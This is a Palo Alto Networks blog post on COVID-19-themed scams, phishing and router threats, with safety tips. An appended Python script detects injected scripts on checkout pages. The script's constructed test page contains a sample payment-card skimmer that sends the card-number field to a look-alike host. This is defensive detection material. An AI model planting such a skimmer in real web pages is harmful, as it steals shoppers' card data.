{"id":116213,"date":"2020-07-21T06:00:57","date_gmt":"2020-07-21T13:00:57","guid":{"rendered":"https:\/\/www.paloaltonetworks.com\/blog\/?p=116213"},"modified":"2020-10-09T12:48:38","modified_gmt":"2020-10-09T19:48:38","slug":"unit-42-cybercrime-gold-rush","status":"publish","type":"post","link":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/2020\/07\/unit-42-cybercrime-gold-rush\/","title":{"rendered":"COVID-19: The Cybercrime Gold Rush of 2020"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">If you told me at the start of 2020 that for the first time in the history of cybersecurity, we\u2019d see every industry and every type of device across the globe targeted by attacks based around a single theme, I wouldn\u2019t have believed you. If you told me this theme would hinge on exploiting a global pandemic and attackers would target even medical researchers on the front lines trying to stop this disease, I wouldn\u2019t have believed that either. Yet, here we are, and our reality indeed includes a cybercrime gold rush aimed at taking advantage of COVID-19.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Just last week, the United Kingdom\u2019s National Cyber Security Centre, Canada\u2019s Communications Security Establishment and the United States National Security Agency issued a <\/span><a href=\"https:\/\/media.defense.gov\/2020\/Jul\/16\/2002457639\/-1\/-1\/0\/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">joint advisory<\/span><\/a><span style=\"font-weight: 400;\"> detailing how APT29 (also known as Cozy Bear), which the advisory assesses is almost certainly part of the Russian intelligence services, has been targeting organizations involved in COVID-19 vaccine development in those three countries.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The researchers on the Unit 42 threat intelligence team at Palo Alto Networks are closely tracking a plethora of COVID-19-themed cyber attacks that have emerged around the world 
over the past few months. Since the beginning of this year, <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/how-cybercriminals-prey-on-the-covid-19-pandemic\/\"><span style=\"font-weight: 400;\">we\u2019ve identified more than 40,000 newly registered websites<\/span><\/a><span style=\"font-weight: 400;\"> using a coronavirus-related name that we\u2019d classify as \u201chigh-risk\u201d because of the scams and malware they push onto unsuspecting consumers.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The global impact of the COVID-19 pandemic, coupled with <\/span><a href=\"https:\/\/www.edelman.com\/news-awards\/2020-edelman-trust-barometer\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">a lack of trust in the government and media as reliable sources of information<\/span><\/a><span style=\"font-weight: 400;\">, has created a perfect storm in which cybercriminals enjoy greater success. People are constantly looking for new sources of supplies and information, and cybercriminals have seized the opportunity to exploit this.\u00a0<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Why It Matters<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">Attackers have homed in on the opportunity created by people searching for COVID-19 updates and shopping for essential goods online by <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/how-cybercriminals-prey-on-the-covid-19-pandemic\/\"><span style=\"font-weight: 400;\">creating profit-motivated attacks<\/span><\/a><span style=\"font-weight: 400;\">.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We\u2019ve found:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Scam sites offering items like face masks and hand sanitizer for low prices.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Fake COVID-19 ebooks, promising new \u201ctips\u201d on how to stay safe. 
In actuality, these sites deliver no product after the purchase is completed and instead just steal both the money and all the personal and financial information entered on the site.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Evidence that suggests cybercriminals are also registering standby websites that are currently dormant, ready to be spun up quickly when another of their scam sites is taken down.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Cybercriminals using cloud service providers (such as Amazon, Google, Microsoft and Alibaba) <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/covid-19-cloud-threat-landscape\/\"><span style=\"font-weight: 400;\">to host some of these malicious sites<\/span><\/a><span style=\"font-weight: 400;\">, because a site served from a major cloud provider\u2019s infrastructure blends in with legitimate traffic to that provider, which makes it harder to detect and block. (Thanks to the rigorous screening and monitoring processes employed by these cloud providers, and likely because of the higher cost of using them, it has so far been relatively rare for malicious actors to host malicious domains in public clouds.)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">We\u2019ve also uncovered \u2013 and blocked \u2013 a wide variety of cyber threats globally that are <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/covid-19-themed-cyber-attacks-target-government-and-medical-organizations\/\"><span style=\"font-weight: 400;\">recklessly targeting government healthcare agencies, local and regional governments, and large universities<\/span><\/a><span style=\"font-weight: 400;\"> that are dealing with the critical response efforts of the COVID-19 pandemic. 
Regions impacted include the US, Canada, Germany, Turkey, Korea and Japan.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While it\u2019s not surprising that cybercriminals are seizing this opportunity to exploit the pandemic for personal gain, it\u2019s clear that the criminals who profit from cybercrime are going to great lengths to succeed and are in it for the long haul.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We\u2019re continuing to monitor and protect against these threats, but it\u2019s important to note that these shifts in behavior show cybercriminals investing time and resources to bolster their attacks.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Looking Ahead<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">With COVID-19 cases continuing to rise in certain countries, and a second wave of the virus anticipated to hit later this year, we\u2019ll continue to see attackers\u2019 themes evolve with news of the pandemic. For example, toward the end of June, we picked up malicious emails with the subjects \"Supplier-Face Mask\/Forehead Thermometer\" and \"Supply medical mask, protective glasses and temperature gun.\" Both lures concern preparing for and returning to public life rather than staying home. I expect this trend to keep tracking the news and business priorities.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Additionally, we anticipate that the U.S. will likely be targeted more heavily than countries where COVID-19 no longer affects daily life (such as New Zealand).<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We also expect to see a spike in cybercrime as economies go into recession. 
With unemployment numbers around the world growing dramatically, some people will inevitably turn to cybercrime, as <\/span><a href=\"https:\/\/searchcio.techtarget.com\/blog\/TotalCIO\/Economic-recession-to-spur-dramatic-increase-in-cybercrime\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">typically happens in economic downturns<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Lastly, <\/span><span style=\"font-weight: 400;\">given that more of the workforce is now working remotely from home, we anticipate an increase in attackers targeting home routers and other Internet of Things (IoT) devices to compromise home networks.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These devices are already frequently targeted, especially since <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/iot-threat-report-2020\/\"><span style=\"font-weight: 400;\">98% of all IoT device traffic<\/span><\/a><span style=\"font-weight: 400;\"> is unencrypted, so an attacker with a foothold on the network can simply read the personal or confidential data those devices send. While we don\u2019t have the data to show this is currently happening, a very likely next step for attackers would be to use compromised home routers for more than just <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices\/\"><span style=\"font-weight: 400;\">mining cryptocurrency<\/span><\/a><span style=\"font-weight: 400;\"> or <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/\"><span style=\"font-weight: 400;\">launching DDoS attacks<\/span><\/a><span style=\"font-weight: 400;\">, as they have in the past. 
With more employees working from home, outside the protection of enterprise security tools and the corporate firewall, attackers may begin trying to steal sensitive corporate data that they couldn\u2019t previously reach so easily. Consumers should make sure the router\u2019s administrative password (the one for the device\u2019s management interface, which is separate from the Wi-Fi password) isn\u2019t the factory default (often just \u201cAdmin\u201d), and should update the router to the latest firmware version. Too often, consumers set a password only for their wireless network and do not realize that the device itself also needs its own unique password.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Here are our recommended tips for consumers and businesses to stay safe during this time:<\/span><\/p>\n<h4>Consumers:<\/h4>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Be wary of websites offering \u201ctoo-good-to-be-true\u201d deals on COVID-19 essentials, like face masks and hand sanitizer.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Treat all emails and websites purporting to offer information about COVID-19 as suspicious.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">To avoid becoming the victim of a phishing attack, always check the three main indicators shown in Figure 1 below: the correct domain name, the presence of the padlock and valid certificate ownership. Note that the padlock only tells you the connection to the site named in the address bar is encrypted; phishing sites routinely obtain valid certificates too, so the domain name is the indicator that actually distinguishes a fake from the real site.<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\"  class=\"alignright wp-image-116214 lozad\"  data-src=\"https:\/\/www.paloaltonetworks.com\/blog\/wp-content\/uploads\/2020\/07\/BofA.png\" alt=\"Avoid becoming a victim of the cybercrime gold rush by taking three actions to check the validity of websites, as shown here: 1) Verify if domain name is correct, 2) Look for padlock, 3) Validate certificate ownership\" width=\"500\" height=\"298\" \/><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If 
you believe your credit card information was stolen as a result of a recent online purchase, contact your bank immediately to freeze or replace the card.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Consider putting a freeze on your credit, so that new accounts can\u2019t be opened using your personal information.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Make sure your home router has its own administrative password, separate from your Wi-Fi password. If you don\u2019t know how to set one, visit your device manufacturer\u2019s site for step-by-step instructions.\u00a0<\/span>\n<ul>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/www.linksys.com\/ca\/support-article?articleNum=135554\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for Linksys<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/kb.netgear.com\/23439\/How-do-I-change-my-NETGEAR-router-s-WiFi-password-or-network-name-SSID\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for Netgear<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/thedroidguy.com\/how-to-reset-asus-router-password-1091859\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for ASUS<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/eu.dlink.com\/uk\/en\/support\/faq\/routers\/mydlink-routers\/dir-810l\/how-do-i-change-the-wifi-password-on-my-router\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for D-Link<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4>Businesses:<\/h4>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Run a <\/span><a 
href=\"https:\/\/www.paloaltonetworks.com\/services\/bpa\"><span style=\"font-weight: 400;\">Best Practice Assessment<\/span><\/a><span style=\"font-weight: 400;\"> to identify where your configuration could be changed to improve your security posture.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Use URL Filtering to block the \u201cNewly-Registered Domains\u201d category, which contains domains registered in the last 32 days; that is where newly registered scam sites like the ones described above first show up.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If you cannot block access to the Newly Registered Domains category, our recommendation is to enforce SSL decryption for these URLs for increased visibility and to block users from downloading risky file types such as PowerShell scripts and executables.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">You can also apply a much stricter Threat Prevention policy and increase logging for traffic to Newly Registered Domains. We also recommend <\/span><a href=\"https:\/\/www.paloaltonetworks.com\/blog\/2020\/04\/network-dns-security\/\"><span style=\"font-weight: 400;\">DNS-layer protection<\/span><\/a><span style=\"font-weight: 400;\">, as we know over 80% of malware uses DNS to establish C2.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">eCommerce and online retailers can mitigate risk by patching all their systems, components and web plugins to avoid being compromised.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Regularly conduct web content integrity checks offline, comparing the pages you serve against a known-good copy, to detect whether attackers have edited them and inserted malicious JavaScript (for example, a payment-card skimmer on a checkout page).<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Make sure your content management system (CMS) administrator accounts use strong, unique passwords, and enable multi-factor authentication where the CMS supports it, so they are less susceptible to brute force 
attacks.<\/span><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Unit 42 has been tracking a cybercrime gold rush aimed at taking advantage of the pandemic. Learn best practices to help avoid exploitation.<\/p>\n","protected":false},"author":65,"featured_media":108494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[6765],"tags":[3967,7050,922,586],"coauthors":[704],"class_list":["post-116213","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-secure-the-enterprise","tag-best-practices","tag-covid-19","tag-threat-intelligence","tag-unit-42"],"jetpack_featured_media_url":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_2009.jpg","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/comments?post=116213"}],"version-history":[{"count":4,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213\/revisions"}],"predecessor-version":[{"id":119415,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213\/revisions\/119415"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/media\/108494"}],"wp:attachment":
[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/media?parent=116213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/categories?post=116213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/tags?post=116213"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/coauthors?post=116213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
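The offline web content integrity check recommended in the Businesses list above, as an added example that is not code from the original post: a Python script that inventories every `<script>` element in a known-good copy of a page and in the copy currently being served, then reports scripts that were added, removed or changed, and separately flags any added external script loaded from a host you do not expect to serve your scripts. The checkout page, the hostnames `shop.example` and `cdn-analytics-examp1e.com`, and the allowed-host list are constructed for the demonstration.

```python
"""
Offline web content integrity check for an e-commerce page: compare a
known-good snapshot of a page against the copy currently being served and
flag every <script> that was added, removed or changed. Added example, not
code from the original post; the sample pages, the hostnames and the
allowed-host list below are constructed for the demonstration.
"""
import hashlib
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urlsplit


@dataclass
class ScriptInventory:
    """What a page loads: external script URLs and SHA-256 digests of inline script bodies."""
    external: set = field(default_factory=set)
    inline: dict = field(default_factory=dict)   # sha256 hex digest -> script body


class ScriptCollector(HTMLParser):
    """Records every <script> element while parsing; inline bodies are hashed on the end tag."""

    def __init__(self):
        super().__init__()
        self.inventory = ScriptInventory()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.inventory.external.add(src.strip())
        else:                       # no src attribute: the script body follows as data
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            body = "".join(self._buf).strip()
            self.inventory.inline[hashlib.sha256(body.encode()).hexdigest()] = body
            self._in_inline = False


def inventory_scripts(html: str) -> ScriptInventory:
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.inventory


def integrity_report(baseline_html: str, current_html: str, allowed_hosts: set) -> dict:
    """Diff the script inventories of two copies of the same page.

    allowed_hosts lists the origins expected to serve your scripts (your own site,
    your CDN). An added external script from any other host is reported separately,
    since that is the usual shape of an injected skimmer loader. Relative URLs
    (hostname None) count as same-origin.
    """
    base, cur = inventory_scripts(baseline_html), inventory_scripts(current_html)
    added_external = sorted(cur.external - base.external)
    return {
        "added_external": added_external,
        "removed_external": sorted(base.external - cur.external),
        # an inline script whose body changed shows up as one removed and one added digest
        "added_inline": [cur.inline[d] for d in cur.inline if d not in base.inline],
        "removed_inline": [base.inline[d] for d in base.inline if d not in cur.inline],
        "untrusted_external": [u for u in added_external
                               if urlsplit(u).hostname not in (allowed_hosts | {None})],
    }


# Constructed sample: the checkout page as archived after the last deployment...
BASELINE_PAGE = """<!doctype html>
<html><head><title>Checkout</title>
<script src="https://shop.example/static/app.js"></script>
<script>window.cfg = {"currency": "USD"};</script>
</head><body><form id="checkout"><input name="cc_number"></form></body></html>"""

# ...and as served now, after an attacker injected a skimmer: one external loader
# from a look-alike host plus one inline hook that exfiltrates the card number.
CURRENT_PAGE = BASELINE_PAGE.replace(
    "</head>",
    '<script src="https://cdn-analytics-examp1e.com/jquery.min.js"></script>\n'
    '<script>document.forms[0].addEventListener("submit", function () {\n'
    '  new Image().src = "https://cdn-analytics-examp1e.com/c?d=" +\n'
    '    btoa(document.forms[0].cc_number.value); });</script>\n</head>')


def demo() -> dict:
    """Run the check on the constructed pages; only shop.example may serve scripts."""
    return integrity_report(BASELINE_PAGE, CURRENT_PAGE, allowed_hosts={"shop.example"})


if __name__ == "__main__":
    for key, items in demo().items():
        print(f"{key}: {items}")
```

Run it against the saved and live copies of each high-value page (checkout, login, payment) on a schedule; a non-empty `untrusted_external` or `added_inline` list is the signal to pull the page and investigate how the edit got there.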